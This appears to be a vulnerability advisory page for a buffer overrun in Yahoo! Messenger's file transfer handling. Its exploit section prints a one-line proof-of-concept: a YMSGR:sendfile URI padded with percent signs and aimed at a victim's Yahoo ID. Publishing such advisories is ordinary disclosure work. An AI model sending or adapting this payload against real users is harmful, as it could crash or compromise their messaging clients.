Yahoo! Messenger File Transfer Buffer Overrun Vulnerability

info
discussion
exploit
solution
references

Yahoo! Messenger File Transfer Buffer Overrun Vulnerability

The following proof-of-concept example was provided:

YMSGR:sendfile?[victim_yahooID]+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%&c%c:\[somefile]